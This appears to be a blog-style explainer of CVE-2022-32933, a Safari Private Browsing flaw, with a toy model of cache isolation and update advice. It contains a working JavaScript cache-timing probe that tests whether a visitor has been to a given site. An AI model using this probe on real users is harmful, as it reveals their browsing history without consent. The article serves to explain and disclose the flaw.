For many Apple users, Private Browsing in Safari on macOS is supposed to be just that—private. But the 2022 vulnerability tracked as CVE-2022-32933 threw a wrench into that expectation. This bug could let a website track the other websites you visited, even while using Private Browsing Mode. Below, we break down how that happened, show you the simplified code that made it possible, and explain how Apple fixed it in Monterey 12.5.

What is CVE-2022-32933?

CVE-2022-32933 is an information disclosure vulnerability affecting Safari’s Private Browsing Mode on macOS systems. When you browse in Private Mode, Safari isn’t supposed to save your browsing history, cookies, or website data. But this glitch allowed a specially crafted website to infer which websites you had already visited in your Private Browsing session.

Apple’s official advisory:
https://support.apple.com/en-us/HT213345

National Vulnerability Database:
https://nvd.nist.gov/vuln/detail/CVE-2022-32933

How Did the Vulnerability Work?

Safari's Private Browsing is meant to keep your sessions isolated. But deep down, browsers use multiple tricks (like storing information in memory) to improve performance and make websites load faster.

A website could exploit the way Safari reused in-memory caches, even in Private Mode, to “test” whether you had visited another site. Specifically, by checking whether certain resources (like images or scripts from other websites) loaded immediately—or not—the site could guess if those resources were previously cached in your session.

In simple terms:
Safari was keeping a record of some parts of your browsing session and letting websites check for them. This was possible because some privacy-related code was missing or faulty.

Exploit Details: The Attack in Action

Here’s a simple breakdown of the attack, with an example using JavaScript. No, you can't see which exact sites someone visited, but you can test for specific ones.

Let's say an attacker wants to know if you've visited "trustedbank.com" during your Private session.

1. The attacker makes a hidden image request to https://trustedbank.com/logo.png on their own (malicious) webpage.

2. Then, using JavaScript, the attacker measures how long it takes for the image to load.

3. If the image loads instantly, it probably came from Safari's in-memory cache, meaning you visited that website already.

Here’s a simple JavaScript code snippet that shows this idea:

function checkVisit(url, callback) {
  const img = new Image();
  const startTime = performance.now();
  img.onload = img.onerror = function () {
    const duration = performance.now() - startTime;
    // If loading is very fast, there's a good chance it was cached (meaning visited)
    callback(duration < 50);
  };
  // Request the URL unchanged: a random query string would make every
  // request a cache miss, so the timing would say nothing about earlier visits.
  img.src = url;
}

// Usage:
checkVisit('https://trustedbank.com/logo.png', function(visited) {
  if (visited) {
    alert('User likely visited trustedbank.com');
  } else {
    alert('User has not visited trustedbank.com');
  }
});

Explanation:
A website can call checkVisit() on a list of URLs to build a profile of which sites you may have visited—all while you’re supposedly browsing "privately."

The Fix: Cleaning Up Private Browsing

Once Apple knew about this privacy leak, the fix was straightforward: Remove the code that enabled this type of caching in Private Browsing Mode. That way, every page load in Private Mode would be “fresh,” blocking sites from detecting previous visits.

From Apple’s update notes for macOS Monterey 12.5:

> “An information disclosure issue was addressed by removing the vulnerable code.”
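
Why a shared in-memory cache leaks history and how isolation closes the leak, as a toy model added here (not Apple's or WebKit's code, and not from the original article). The `partitioned` policy goes beyond the fix the article describes; the policy names, the timings and `attacker.example` are constructed for illustration.

```javascript
// Toy model, constructed for illustration; not Safari or WebKit code.
const HIT_MS = 2;    // constructed: resource served from the in-memory cache
const MISS_MS = 120; // constructed: resource fetched over the network

// policy: "shared" | "partitioned" | "no-private-cache"
function makeCache(policy) {
  const store = new Set();
  return {
    // topSite: site in the address bar; url: the resource being loaded.
    // Returns the simulated load time in milliseconds.
    load(topSite, url, isPrivate) {
      if (policy === "no-private-cache" && isPrivate) return MISS_MS;
      const key = policy === "partitioned" ? `${topSite} ${url}` : url;
      if (store.has(key)) return HIT_MS;
      store.add(key);
      return MISS_MS;
    },
  };
}

const RESOURCE = "https://trustedbank.com/logo.png";

// Load time a third-party page observes for RESOURCE in a private session,
// with or without an earlier first-party visit to the resource's own site.
function observedTime(policy, visitedFirst) {
  const cache = makeCache(policy);
  if (visitedFirst) cache.load("trustedbank.com", RESOURCE, true);
  return cache.load("attacker.example", RESOURCE, true);
}

// The cache leaks history if the two sessions are distinguishable by timing.
function leaksHistory(policy) {
  return observedTime(policy, true) !== observedTime(policy, false);
}

// Cost of each defence: is a repeat load on the same site still fast?
function repeatLoadIsCached(policy) {
  const cache = makeCache(policy);
  cache.load("trustedbank.com", RESOURCE, true);
  return cache.load("trustedbank.com", RESOURCE, true) === HIT_MS;
}

for (const policy of ["shared", "partitioned", "no-private-cache"]) {
  console.log(policy, { leaks: leaksHistory(policy), cached: repeatLoadIsCached(policy) });
}
```

Only the `shared` policy lets the third-party page tell the two sessions apart. Partitioning keeps same-site repeat loads fast, while disabling the cache in private sessions trades that speed away.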

Update to Stay Safe

If you’re running macOS and use Safari Private Browsing, make sure you’ve updated to Monterey 12.5 or later. Safari now isolates private sessions better, making this kind of attack impossible.

- Apple Security Updates for macOS Monterey 12.5

Why Does This Matter?

Private Browsing is meant to give users peace of mind, whether they’re logging into private accounts or simply protecting their browsing from trackers. This bug was a reminder that privacy isn’t just about what’s saved on your computer, but how browsers manage data in real time.

Bottom line:
If your browser keeps data around for “convenience” purposes, attackers may find ways to peek at it—even in Private Browsing.

Conclusion

CVE-2022-32933 was a privacy issue that affected Safari’s Private Browsing, letting websites “test” for other sites you’d visited in a supposedly isolated session. Apple’s fix: clear out the faulty code. If you haven’t updated your Mac recently, now is the time!

Keep your browser updated, and always remember: no privacy tool is perfect, but vigilance helps.

Timeline

Published on: 06/10/2024 20:15:12 UTC
Last modified on: 06/12/2024 18:07:08 UTC